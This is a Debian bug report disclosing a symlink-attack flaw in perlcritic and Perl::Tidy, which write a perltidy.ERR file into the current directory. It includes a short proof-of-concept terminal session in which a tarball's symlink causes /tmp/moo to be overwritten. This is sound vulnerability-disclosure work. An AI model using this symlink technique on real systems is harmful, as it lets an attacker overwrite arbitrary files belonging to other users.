Control: tags -1 + security * Paul Wise <p...@debian.org>, 2016-08-13, 15:09:
There is some code which causes perlcritic to create or overwrite a perltidy.ERR file in the current directory.
Perl::Tidy tries to delete existing perltidy.ERR; but if deleting fails, it proceeds as if nothing happened. This can be abused to overwrite arbitrary files via symlink attack:
$ tar -xvvf 834213.tar.gz dr-xr-xr-x root/root 0 2017-05-14 16:33 834213/ -r--r--r-- root/root 2 2017-05-14 16:30 834213/badsyntax.pm lr-xr-xr-x root/root 0 2017-05-14 16:30 834213/perltidy.ERR -> /tmp/moo $ cd 834213 $ head -n1 /tmp/moo head: cannot open '/tmp/moo' for reading: No such file or directory $ perlcritic --noprofile -1 badsyntax.pm perltidy had errors!! at line 1, column 1. See page 33 of PBP. (Severity: 1) Module does not end with "1;" at line 1, column 1. Must end with a recognizable true value. (Severity: 4) Code not contained in explicit package at line 1, column 1. Violates encapsulation. (Severity: 4) No package-scoped "$VERSION" variable found at line 1, column 1. See page 404 of PBP. (Severity: 2) Code before strictures are enabled at line 1, column 1. See page 429 of PBP. (Severity: 5) Code before warnings are enabled at line 1, column 1. See page 431 of PBP. (Severity: 4) $ head -n1 /tmp/moo 1: final indentation level: 1 -- Jakub Wilk
834213.tar.gz
Description: application/gzip
